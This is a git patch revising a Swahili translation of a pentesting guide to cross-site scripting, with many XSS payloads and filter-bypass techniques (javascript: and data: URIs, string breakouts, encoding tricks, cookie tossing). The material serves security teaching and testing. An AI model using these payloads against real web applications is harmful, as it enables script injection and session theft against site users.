From b40a1679e9c7bdcdfbd0be9648db19957748b819 Mon Sep 17 00:00:00 2001 From: Translator Date: Mon, 29 Sep 2025 15:07:50 +0000 Subject: [PATCH] Translated ['src/pentesting-web/xss-cross-site-scripting/wasm-linear-mem --- src/SUMMARY.md | 1 + .../xss-cross-site-scripting/README.md | 418 +++++++++--------- ...sm-linear-memory-template-overwrite-xss.md | 133 ++++++ 3 files changed, 347 insertions(+), 205 deletions(-) create mode 100644 src/pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index be4d4275a..4c7d77d24 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -725,6 +725,7 @@ - [SOME - Same Origin Method Execution](pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.md) - [Sniff Leak](pentesting-web/xss-cross-site-scripting/sniff-leak.md) - [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md) + - [Wasm Linear Memory Template Overwrite Xss](pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.md) - [XSS in Markdown](pentesting-web/xss-cross-site-scripting/xss-in-markdown.md) - [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md) - [XS-Search/XS-Leaks](pentesting-web/xs-search/README.md) diff --git a/src/pentesting-web/xss-cross-site-scripting/README.md b/src/pentesting-web/xss-cross-site-scripting/README.md index 4c1b74ec0..5683df430 100644 --- a/src/pentesting-web/xss-cross-site-scripting/README.md +++ b/src/pentesting-web/xss-cross-site-scripting/README.md @@ -4,81 +4,80 @@ ## Mbinu -1. Angalia kama **thamani yoyote unayodhibiti** (_parameters_, _path_, _headers_?, _cookies_?) ina **inaakisiwa** kwenye HTML au **inatumika** na **JS** code. -2. **Tafuta muktadha** ambapo imeakisiwa/inatumika. -3. Ikiwa **imeakisiwa** +1. Angalia kama **thamani yoyote unayonadhibiti** (_parameters_, _path_, _headers_?, _cookies_?) inarudishwa (**reflected**) katika HTML au **inatumika** na **JS** code. +2. **Tambua muktadha** ambako inarudishwa/inatumiwa. +3. Ikiwa **inarudishwa** 1. Angalia **ni alama gani unaweza kutumia** na kulingana na hilo, andaa payload: 1. Katika **raw HTML**: -1. Je, unaweza kuunda new HTML tags? -2. Je, unaweza kutumia events au attributes zinazounga mkono protocol ya `javascript:`? -3. Je, unaweza bypass kinga? -4. Je, HTML content inaelezwa na engine yoyote ya client side JS (_AngularJS_, _VueJS_, _Mavo_...)? Unaweza kuabusu [**Client Side Template Injection**](../client-side-template-injection-csti.md). -5. Ikiwa huwezi kuunda HTML tags zinazotekeleza JS code, je, unaweza kuabusu [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)? +1. Je, unaweza kuunda tags mpya za HTML? +2. Je, unaweza kutumia events au attributes zinazounga mkono `javascript:` protocol? +3. Je, unaweza kuepuka ulinzi? +4. Je, maudhui ya HTML yanatafsiriwa na engine yoyote ya client side JS (_AngularJS_, _VueJS_, _Mavo_...), ambayo unaweza kutumia [**Client Side Template Injection**](../client-side-template-injection-csti.md). +5. Ikiwa huwezi kuunda HTML tags zinazotekeleza code ya JS, je, unaweza kutumia [**Dangling Markup - HTML scriptless injection**](../dangling-markup-html-scriptless-injection/index.html)? 2. Ndani ya **HTML tag**: -1. Je, unaweza kutoka kwenye attribute na kutoka kwenye tag (basi utakuwa kwenye raw HTML) na kuunda new HTML tag ya kuabusu? -2. Je, unaweza kuunda new events/attributes za kutekeleza JS code? -3. Je, attribute ambamo umekwama inaunga mkono utekelezaji wa JS? -4. Je, unaweza bypass kinga? +1. Je, unaweza kutoka katika muktadha wa raw HTML? +2. Je, unaweza kuunda events/attributes mpya za kukimbisha JS code? +3. Je, attribute ambamo umefungwa inaunga mkono utekelezaji wa JS? +4. Je, unaweza kuepuka ulinzi? 3. Ndani ya **JavaScript code**: -1. Je, unaweza kutoka kwenye ``** tags za ukurasa wa HTML, ndani ya faili `.js` au ndani ya attribute inayotumia protocol ya **`javascript:`**: +Katika kesi hii ingizo lako linaonyeshwa kati ya **``** tags za ukurasa wa HTML, ndani ya faili `.js` au ndani ya sifa inayotumia protocol **`javascript:`**: -- Ikiwa kinafunuliwa kati ya **``** tags, hata kama kiingilio chako kiko ndani ya aina yoyote ya quotes, unaweza kujaribu kuchoma `` na kutoroka kutoka katika muktadha huu. Hii inafanya kazi kwa sababu **browser will first parse the HTML tags** na kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya `` iliyochomwa iko ndani ya HTML code. -- Ikiwa kinafunuliwa **ndani ya JS string** na trick ya mwisho haifanyi kazi utahitaji **kuondoka** kwenye string, **kutekeleza** code yako na **kujenga upya** JS code (kama kuna kosa lolote, haitatekelezwa: +- Ikiwa imeonyeshwa kati ya **``** tags, hata kama ingizo lako liko ndani ya aina yoyote ya nukuu, unaweza kujaribu kuingiza `` na kutoroka katika muktadha huu. Hii inafanya kazi kwa sababu **kivinjari kitasoma kwanza lebo za HTML** kisha yaliyomo, kwa hiyo haitagundua kuwa tagi yako ya `` uliyoingiza iko ndani ya msimbo wa HTML. +- Ikiwa imeonyeshwa **ndani ya JS string** na mbinu ya mwisho haitumiki utahitaji **kutoka** kwenye string, **kutekeleza** msimbo wako na **kujenga upya** msimbo wa JS (kama kuna kosa, hautatekelezwa: - `'-alert(1)-'` - `';-alert(1)//` - `\';alert(1)//` -- Ikiwa kinafunuliwa ndani ya template literals unaweza **kuingiza JS expressions** kwa kutumia `${ ... }` syntax: `` var greetings = `Hello, ${alert(1)}` `` -- **Unicode encode** inafanya kazi kuandika **valid javascript code**: +- Ikiwa imeonyeshwa ndani ya template literals unaweza **kuingiza expressions za JS** ukitumia syntaxi `${ ... }`: `var greetings = `Hello, ${alert(1)}`` +- **Kutumia encoding ya Unicode** hufanya iwezekane kuandika **valid javascript code**: ```javascript alert(1) alert(1) @@ -86,8 +85,8 @@ alert(1) ``` #### Javascript Hoisting -Javascript Hoisting inaashiria fursa ya **kutangaza functions, variables or classes baada ya kutumika ili uweze kutumia vibaya mazingira ambapo XSS inatumia undeclared variables au functions.**\ -**Angalia ukurasa ufuatao kwa habari zaidi:** +Javascript Hoisting inarejelea fursa ya **kutangaza functions, variables au classes baada ya zimetumika ili uweze kutumia mazingira ambapo XSS inatumia undeclared variables au functions.**\ +**Tazama ukurasa ufuatao kwa maelezo zaidi:** {{#ref}} @@ -96,19 +95,19 @@ js-hoisting.md ### Javascript Function -Several web pages have endpoints that **accept as parameter the name of the function to execute**. A common example to see in the wild is something like: `?callback=callbackFunc`. +Kurasa kadhaa za wavuti zina endpoints ambazo **zinakubali kama parameter jina la function la kutekeleza**. Mfano wa kawaida wa kuona ni kitu kama: `?callback=callbackFunc`. -Njia nzuri ya kugundua ikiwa kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni **kubadilisha thamani ya param** (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama: +Njia nzuri ya kugundua kama kitu kinachotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni kwa **kubadilisha thamani ya param** (kwa mfano kuwa 'Vulnerable') na kuangalia console kwa makosa kama: ![](<../../images/image (711).png>) -Iwapo ni vulnerable, unaweza kuweza **kuamsha an alert** kwa kutuma thamani: **`?callback=alert(1)`**. Hata hivyo, ni kawaida kuwa endpoints hizi zitakuwa **zikithibitisha maudhui** ili kuruhusu tu letters, numbers, dots na underscores (**`[\w\._]`**). +Ikiwa ni vulnerable, unaweza kuwa na uwezo wa **kusababisha alert** kwa kutuma tu thamani: **`?callback=alert(1)`**. Hata hivyo, mara nyingi endpoint hizi zitakuwa **zikithibitisha yaliyomo** ili kuruhusu tu herufi, nambari, titikio na underscores (**`[\w\._]`**). -Hata hivyo, hata kwa kizuizi hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars hizo halali ili **kupata access kwa element yoyote katika DOM**: +Hata hivyo, hata kwa kikomo hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia chars halali hizo kufikia **element yoyote kwenye DOM**: ![](<../../images/image (747).png>) -Some useful functions for this: +Baadhi ya functions zenye manufaa kwa hili: ``` firstElementChild lastElementChild @@ -116,11 +115,11 @@ nextElementSibiling lastElementSibiling parentElement ``` -Unaweza pia kujaribu kusababisha Javascript functions moja kwa moja: `obj.sales.delOrders`. +Unaweza pia kujaribu **kusababisha Javascript functions** moja kwa moja: `obj.sales.delOrders`. -Hata hivyo, kawaida endpoints zinazotekeleza function iliyotajwa ni endpoints zisizo na DOM nyingi za kuvutia, **other pages in the same origin** zitakuwa na **more interesting DOM** za kufanya vitendo zaidi. +Hata hivyo, kawaida endpoints zinazotekeleza function iliyoashiriwa ni endpoints zisizo na DOM yenye mvuto mwingi, **kurasa nyingine katika same origin** zitakuwa na **DOM yenye mvuto zaidi** za kufanya vitendo vingi. -Kwa hivyo, ili **abuse this vulnerability in a different DOM** uhusishaji wa **Same Origin Method Execution (SOME)** ulitengenezwa: +Hivyo, ili **kuutumia udhaifu huu kwenye DOM tofauti** exploit ya **Same Origin Method Execution (SOME)** ilitengenezwa: {{#ref}} @@ -129,8 +128,7 @@ some-same-origin-method-execution.md ### DOM -Kuna **JS code** inayotumia kwa njia **isiyo salama** baadhi ya **data controlled by an attacker** kama `location.href`. Mshambulizi anaweza kutumia hili kutekeleza arbitrary JS code. - +Kuna **JS code** inayotumia kwa njia isiyo salama baadhi ya **data inayodhibitiwa na mshambulizi** kama `location.href`. Mshambulizi anaweza kutumia hili kuendesha arbitrary JS code. {{#ref}} dom-xss.md @@ -138,8 +136,8 @@ dom-xss.md ### **Universal XSS** -Aina hizi za XSS zinaweza kupatikana **anywhere**. Hazitegemei tu unyonyaji wa client wa web application bali zinategemea **any** **context**. Aina hizi za **arbitrary JavaScript execution** zinaweza hata kutumiwa kupata **RCE**, kusoma **arbitrary** **files** kwa clients na servers, na mengine mengi.\ -Baadhi ya **examples**: +Aina hizi za XSS zinaweza kupatikana **mahali popote**. Hazitegemei tu udhaifu wa client wa web application bali zinategemea **muktadha** wowote. Aina hizi za **arbitrary JavaScript execution** zinaweza hata kutumiwa kupata **RCE**, **kusoma** **faili zozote** kwenye clients na servers, na mengine mengi.\ +Baadhi ya **mfano**: {{#ref}} @@ -155,11 +153,11 @@ server-side-xss-dynamic-pdf.md ![from https://twitter.com/hackerscrolls/status/1273254212546281473?s=21](<../../images/EauBb2EX0AERaNK (1).jpg>) -## Kuingiza ndani ya raw HTML +## Injecting inside raw HTML -Wakati input yako inarudishwa **inside the HTML page** au unaweza kutoroka na kuingiza HTML code katika muktadha huu, jambo la **kwanza** unalopaswa kufanya ni kuangalia kama unaweza kutumia `<` kuunda tags mpya: Jaribu tu **reflect** hiyo **char** na angalia kama inafanyiwa **HTML encoded** au **deleted** au kama inarudishwa **without changes**. **Ni tu katika kesi ya mwisho utaweza ku-exploit hili**.\ -Kwa kesi hizi pia **kumbuka** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ -_**Kumbuka: Maoni ya HTML yanaweza kufungwa kwa kutumia\*\***\***\*`-->`\*\***\***\*au \*\***`--!>`\*\***_ +When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\ +For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\ +_**Kumbuka: A HTML comment can be closed using\*\***\***\*`-->`\*\***\***\*or \*\***`--!>`\*\***_ Katika kesi hii na ikiwa hakuna black/whitelisting inatumiwa, unaweza kutumia payloads kama: ```html @@ -169,22 +167,22 @@ alert(1) ``` -Lakini, ikiwa tags/attributes black/whitelisting inatumika, utahitaji **brute-force which tags** unaweza kuunda.\ -Mara utakapogundua **which tags are allowed**, utahitaji **brute-force attributes/events** ndani ya tags halali ulizopata ili kuona jinsi unaweza kushambulia muktadha. +Lakini, ikiwa black/whitelisting ya tags/attributes inatumiwa, utahitaji **brute-force which tags** unaweza kuunda.\ +Mara utakapo **gundua ni tags zipi zinazoruhusiwa**, itabidi **brute-force attributes/events** ndani ya tags halali ulizopata ili kuona jinsi unavyoweza kushambulia muktadha. ### Tags/Events brute-force -Nenda kwenye [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) na bonyeza _**Copy tags to clipboard**_. Kisha, tuma zote kwa kutumia Burp intruder na ukague kama kuna tags ambazo WAF haikutambua kama zenye madhara. Mara utakapogundua tags unazoweza kutumia, unaweza **brute force all the events** ukitumia tags halali (kwenye ukurasa uleule bonyeza _**Copy events to clipboard**_ na fuata utaratibu uleule kama awali). +Nenda kwenye [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) na bonyeza _**Copy tags to clipboard**_. Kisha, tuma zote kwa kutumia Burp intruder na angalia kama kuna tag ambayo WAF haikutambua kama hatari. Mara utakapo gundua tags unazoweza kutumia, unaweza **brute force all the events** kwa kutumia tags halali (katika ukurasa huo huo bonyeza _**Copy events to clipboard**_ na fuata taratibu ule ule kama hapo awali). -### Custom tags +### Tags maalum -Ikiwa hukupata tag yoyote halali ya HTML, unaweza kujaribu **kuunda a custom tag** na kutekeleza JS code kwa kutumia attribute ya `onfocus`. Katika request ya XSS, unahitaji kumalizia URL na `#` ili kuifanya page **focus on that object** na **execute** the code: +Ikiwa hukupata tag yoyote ya HTML halali, unaweza kujaribu kuunda tag maalum na kutekeleza JS code kwa kutumia attribute `onfocus`. Katika ombi la XSS, unahitaji kumalizia URL kwa `#` ili kufanya ukurasa **ielekeze kwenye kitu hicho** na **kutekeleza** msimbo: ``` /?search=#x ``` ### Blacklist Bypasses -Ikiwa aina fulani ya blacklist inatumiwa, unaweza kujaribu ku-bypass kwa mbinu za kuchekesha: +Ikiwa aina fulani ya blacklist inatumiwa unaweza kujaribu ku-bypass kwa mbinu za kuchekesha: ```javascript //Random capitalization ``` -### Itifaki Maalum ndani ya sifa +### Itifaki Maalum ndani ya attribute -Huko unaweza kutumia itifaki **`javascript:`** au **`data:`** katika maeneo fulani ili **kuendesha msimbo wowote wa JS**. Baadhi zitahitaji mwingiliano wa mtumiaji; nyingine hazitahitaji. +Huko unaweza kutumia itifaki **`javascript:`** au **`data:`** katika maeneo fulani ili **kutekeleza msimbo wa JS wa hiari**. Baadhi zitahitaji mwingiliano wa mtumiaji; zingine hazitahitaji. ```javascript javascript:alert(1) JavaSCript:alert(1) @@ -331,9 +329,9 @@ data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg== ``` -**Maeneo ambapo unaweza kuingiza protokoli hizi** +**Maeneo unayoweza kuingiza protokoli hizi** -**Kwa ujumla** protokoli ya `javascript:` inaweza **kutumika katika tag yoyote inayokubali attribute `href`** na katika **tag nyingi** zinazokubali attribute ya **`src`** (lakini sio ``) +**Kwa ujumla** protokoli ya `javascript:` inaweza **kutumika katika tag yoyote inayokubali sifa `href`** na katika **sehemu nyingi** za tag zinazokubali sifa ya **`src`** (lakini si ` @@ -355,21 +353,21 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc ``` **Mbinu nyingine za obfuscation** -_**Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu ya awali pia ni halali kwa sababu uko ndani ya attribute.**_ +_**Katika kesi hii HTML encoding na Unicode encoding trick kutoka sehemu iliyopita pia ni halali kwani uko ndani ya attribute.**_ ```javascript ``` -Zaidi ya hayo, kuna **njia nyingine nzuri** kwa kesi hizi: **Hata kama input yako ndani ya `javascript:...` inakuwa URL encoded, itakuwa URL decoded kabla haijaendeshwa.** Kwa hivyo, ikiwa unahitaji **escape** kutoka kwa **string** ukitumia **single quote** na ukaona kwamba **inakuwa URL encoded**, kumbuka kwamba **haina umuhimu,** itatafsiriwa kama **single quote** wakati wa **execution**. +Zaidi ya hayo, kuna **njia nzuri** nyingine kwa kesi hizi: **Hata kama input yako ndani ya `javascript:...` inakuwa URL encoded, ita URL decoded kabla ya kutekelezwa.** Kwa hivyo, ikiwa unahitaji **escape** kutoka kwenye **string** ukitumia **single quote** na unaona kwamba **inakuwa URL encoded**, kumbuka kwamba **haina maana,** itaitafsiriwa kama **single quote** wakati wa **execution**. ```javascript '-alert(1)-' %27-alert(1)-%27 ``` -Kumbuka kwamba ikiwa utajaribu **kutumia zote mbili** `URLencode + HTMLencode` kwa utaratibu wowote ili ku-encode **payload** it **haita** **fanya kazi**, lakini unaweza **kuwachanganya ndani ya payload**. +Kumbuka kwamba ukijaribu **tumia zote mbili** `URLencode + HTMLencode` kwa mpangilio wowote ku-encode **payload** **haita** **fanya kazi**, lakini unaweza **changanya ndani ya payload**. -**Kutumia Hex na Octal encode na `javascript:`** +**Kutumia Hex and Octal encode with `javascript:`** -Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (angalau) kutangaza **HTML tags to execute JS**: +Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` (angalau) ili kutaja **HTML tags to execute JS**: ```javascript //Encoded: // This WORKS @@ -385,17 +383,16 @@ Unaweza kutumia **Hex** na **Octal encode** ndani ya sifa ya `src` ya `iframe` ( ```javascript //No safari @@ -431,37 +428,37 @@ onbeforetoggle="alert(2)" />
Newsletter popup
``` -Kutoka [**hapa**](https://portswigger.net/research/xss-in-hidden-input-fields): Unaweza kutekeleza **XSS payload ndani ya attribute iliyofichwa**, mradi unaweza **kumshawishi** **mtu aliyeathirika** kubonyeza **mchanganyiko wa funguo**. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa funguo ni **ALT+SHIFT+X** na kwenye OS X ni **CTRL+ALT+X**. Unaweza kubainisha mchanganyiko tofauti wa funguo kwa kutumia funguo tofauti katika access key attribute. Hapa kuna vektori: +Kutoka [**here**](https://portswigger.net/research/xss-in-hidden-input-fields): Unaweza kutekeleza **XSS payload inside a hidden attribute**, mradi ukaweza **kumshawishi** **mwanaathiriwa** kubonyeza **mchanganyiko wa vitufe**. Kwenye Firefox kwenye Windows/Linux mchanganyiko wa vitufe ni **ALT+SHIFT+X** na kwenye OS X ni **CTRL+ALT+X**. Unaweza kubainisha mchanganyiko tofauti wa vitufe kwa kutumia kitufe tofauti katika access key attribute. Hapa ni vector: ```html ``` -**XSS payload itakuwa kitu kama hiki: `" accesskey="x" onclick="alert(1)" x="`** +**Payload ya XSS itakuwa kama hii: `" accesskey="x" onclick="alert(1)" x="`** ### Blacklist Bypasses -Mbinu kadhaa za kutumia encoding tofauti tayari zilielezwa ndani ya sehemu hii. Rudi **kujifunza wapi unaweza kutumia:** +Mbinu kadhaa za kutumia encoding tofauti zimetajwa tayari ndani ya sehemu hii. Rudi ili kujifunza wapi unaweza kutumia: - **HTML encoding (HTML tags)** -- **Unicode encoding (can be valid JS code):** `\u0061lert(1)` +- **Unicode encoding (inaweza kuwa valid JS code):** `\u0061lert(1)` - **URL encoding** - **Hex and Octal encoding** - **data encoding** **Bypasses for HTML tags and attributes** -Soma the[ Blacklist Bypasses of the previous section](#blacklist-bypasses). +Soma [ Blacklist Bypasses of the previous section](#blacklist-bypasses). **Bypasses for JavaScript code** -Soma J[avaScript bypass blacklist of the following section](#javascript-bypass-blacklists-techniques). +Soma the [JavaScript bypass blacklist of the following section](#javascript-bypass-blacklists-techniques). ### CSS-Gadgets -Ikiwa umegundua **XSS katika sehemu ndogo sana** ya tovuti ambayo inahitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu **kubadilisha nafasi ambayo kipengele hicho kinachukua** ili kuongeza uwezekano wa link itakapoendeshwa. +Ikiwa umepata **XSS katika sehemu ndogo sana** ya tovuti inayohitaji aina fulani ya mwingiliano (labda link ndogo kwenye footer yenye onmouseover element), unaweza kujaribu **kubadilisha nafasi ambayo kipengele hicho kinachukua** ili kuongeza uwezekano wa link kutekelezwa. -Kwa mfano, unaweza kuongeza styling katika element kama: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5` +Kwa mfano, unaweza kuongeza styling katika kipengele kama: `position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5` -Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa upata, kwa mfano +Lakini, ikiwa WAF inachuja style attribute, unaweza kutumia CSS Styling Gadgets, kwa hivyo ikiwa unapopata, kwa mfano > .test {display:block; color: blue; width: 100%\} @@ -469,27 +466,27 @@ na > \#someid {top: 0; font-family: Tahoma;} -Sasa unaweza kubadilisha link yetu na kuileta kwa umbo +Sasa unaweza kubadilisha link yetu na kuibadilisha kuwa fomu > \ -Njia hii ilichukuliwa kutoka [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703) +Njia hii ilichukuliwa kutoka kwa [https://medium.com/@skavans\_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703](https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703) ## Injecting inside JavaScript code -Katika kesi hizi, **input** yako itarejea ndani ya JS code ya `.js` file au kati ya `` tags au kati ya HTML events ambazo zinaweza kutekeleza JS code au kati ya attributes zinazokubali `javascript:` protocol. +Katika kesi hizi **input** yako itaonyeshwa ndani ya JS code ya faili `.js` au kati ya `` tags au kati ya HTML events zinazoweza kutekeleza JS code au kati ya attributes zinazokubali protocol ya `javascript:`. -### Escaping \` unaweza kwa urahisi **kuepuka kufunga tag ya ` ``` -Kumbuka kwamba katika mfano huu **hatujafunga hata alama ya nukuu moja**. Hii ni kwa sababu **HTML parsing is performed first by the browser**, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwemo blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizoungwa ndani unafanywa tu baadaye. +Kumbuka kwamba katika mfano huu **hatujafunga hata nukuu moja**. Hii ni kwa sababu **HTML parsing is performed first by the browser**, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwa ni pamoja na blocks za script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizopachikwa hufanywa tu baadaye. -### Ndani ya JS code +### Ndani ya msimbo wa JS -If `<>` are being sanitised you can still **escape the string** where your input is being **located** and **execute arbitrary JS**. Ni muhimu **fix JS syntax**, kwa sababu ikiwa kuna makosa, JS code haitatekelezwa: +Ikiwa `<>` zinasafishwa bado unaweza **escape the string** mahali ambapo ingizo lako limewekwa (**located**) na **execute arbitrary JS**. Ni muhimu **fix JS syntax**, kwa sababu ikiwa kuna makosa, msimbo wa JS hautatekelezwa: ``` '-alert(document.domain)-' ';alert(document.domain)// @@ -497,23 +494,23 @@ If `<>` are being sanitised you can still **escape the string** where your input ``` #### JS-in-JS string break → inject → repair pattern -Wakati user input inapoweka ndani ya quoted JavaScript string (kwa mfano, server-side echo into an inline script), unaweza terminate the string, inject code, na repair the syntax ili parsing iendelee kuwa valid. Generic skeleton: +Wakati ingizo la mtumiaji linapoingia ndani ya quoted JavaScript string (kwa mfano, server-side echo katika inline script), unaweza kumaliza string, inject code, na kurekebisha syntax ili parsing ibaki halali. Generic skeleton: ``` " // end original string ; // safely terminate the statement // attacker-controlled JS ; a = " // repair and resume expected string/statement ``` -Mfano wa muundo wa URL wakati parameter hatarishi unarejeshwa ndani ya JS string: +Mfano wa muundo wa URL wakati parameter dhaifu imerejeshwa ndani ya JS string: ``` ?param=test";;a=" ``` -Hii inatekeleza attacker JS bila ya kuhitaji kugusa muktadha wa HTML (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu. +Hii inatekeleza attacker JS bila kuhitaji kugusa HTML context (pure JS-in-JS). Changanya na blacklist bypasses hapa chini wakati filters zinapozuia maneno muhimu. -### Template literals `` +### Template literals \`\` -Ili kujenga **strings** mbali na single na double quotes, JS pia inakubali **backticks** **` `` `**. Hii inajulikana kama template literals kwani zinaruhusu **embedded JS expressions** kwa kutumia sintaksia `${ ... }`.\ -Kwa hivyo, ikiwa ugundua kwamba input yako inarudishwa ndani ya JS string inayotumia backticks, unaweza kuiba sintaksia `${ ... }` kutekeleza **arbitrary JS code**: +Ili kuunda **strings**, mbali na single na double quotes, JS pia inakubali **backticks** **` `` `** . Hii inajulikana kama template literals kwani zinaruhusu **embedded JS expressions** kwa kutumia sintaksia `${ ... }`.\ +Kwa hivyo, ukigundua kuwa input yako ina **reflected** ndani ya JS string inayotumia backticks, unaweza kutumia sintaksia `${ ... }` kutekeleza **arbitrary JS code**: Hii inaweza **kutumiwa vibaya** kwa kutumia: ```javascript @@ -527,35 +524,35 @@ return loop } loop`` ``` -### Utekelezaji wa msimbo uliokodishwa +### Utekelezaji wa code uliosimbwa ```html ``` -**Javascript ndani ya maoni** +**Javascript ndani ya comment** ```javascript //If you can only inject inside a JS comment, you can still leak something //If the user opens DevTools request to the indicated sourceMappingURL will be send @@ -716,7 +713,7 @@ try{throw onerror=alert}catch{throw 1} - [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md) - [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix) -**Mwito wa kazi yoyote (alert)** +**Kuita function yoyote (alert)** ```javascript //Eval like functions eval('ale'+'rt(1)') @@ -776,47 +773,58 @@ top['al\x65rt'](1) top[8680439..toString(30)](1) ``` -## **DOM vulnerabilities** +## **Udhaifu za DOM** -Kuna **JS code** inayotumia **data isiyokuwa salama inayoendeshwa na mshambuliaji** kama `location.href`. Mshambuliaji anaweza kutumia hili kutekeleza msimbo wowote wa JS.\ -**Kwa sababu ya urefu wa maelezo ya** [**DOM vulnerabilities ilihamishiwa kwenye ukurasa huu**](dom-xss.md)**:** +Kuna **JS code** inayotumia **data isiyo salama inayodhibitiwa na mhamasishaji** kama `location.href`. Mhamasishaji anaweza kutumia hili kutekeleza JS arbitrary.\ +**Kutokana na upanuzi wa maelezo ya** [**Udhaifu za DOM - imehamishwa kwenye ukurasa huu**](dom-xss.md)**:** {{#ref}} dom-xss.md {{#endref}} -Utanakutana huko na **maelezo ya kina kuhusu DOM vulnerabilities, jinsi zinavyosababishwa, na jinsi za kuzitumia**.\ -Pia, usisahau kwamba **mwishoni mwa chapisho kilicho takiwa** unaweza kupata maelezo kuhusu [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering). +Hapo utapata **maelezo ya kina kuhusu ni udhaifu gani za DOM, zinawezaje kusababishwa, na jinsi ya kuzitumia**.\ +Pia, usisahau kwamba **mwishoni mwa chapisho kilichotajwa** utaona maelezo kuhusu [**DOM Clobbering attacks**](dom-xss.md#dom-clobbering). -### Upgrading Self-XSS +### Kuimarisha Self-XSS ### Cookie XSS -Ikiwa unaweza kuchochea XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukipata **vulnerable subdomain to XSS**, unaweza kutumia XSS hii kuingiza cookie kwa kikoa chote na hivyo kuchochea cookie XSS kwenye kikoa kikuu au subdomains nyingine (mmoja walio vulnerable kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack: +Ikiwa unaweza kusababisha XSS kwa kutuma payload ndani ya cookie, kawaida hii ni self-XSS. Hata hivyo, ukigundua **subdomain iliyo dhaifu kwa XSS**, unaweza kutumia XSS hiyo kuingiza cookie katika domain nzima na kusababisha cookie XSS kwenye domain kuu au subdomain nyingine (zile zilizo dhaifu kwa cookie XSS). Kwa hili unaweza kutumia cookie tossing attack: {{#ref}} ../hacking-with-cookies/cookie-tossing.md {{#endref}} -You can find a great abuse of this technique in [**this blog post**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html). +Unaweza kupata matumizi makubwa ya mbinu hii katika [**chapisho hili la blogu**](https://nokline.github.io/bugbounty/2024/06/07/Zoom-ATO.html). -### Sending your session to the admin +### Kutuma session yako kwa admin -Labda mtumiaji anaweza kushiriki wasifu wake na admin, na ikiwa self XSS iko ndani ya wasifu wa mtumiaji na admin anaiangalia, ataichochea udhaifu huo. +Huenda mtumiaji anaweza kushiriki profile yake na admin, na ikiwa self XSS iko ndani ya profile ya mtumiaji na admin ataifikia, atasababisha udhaifu huo. -### Session Mirroring +### Kuakisi kikao -Ikiwa unapata self XSS na ukurasa wa wavuti una **session mirroring for administrators**, kwa mfano kuruhusu wateja kuomba 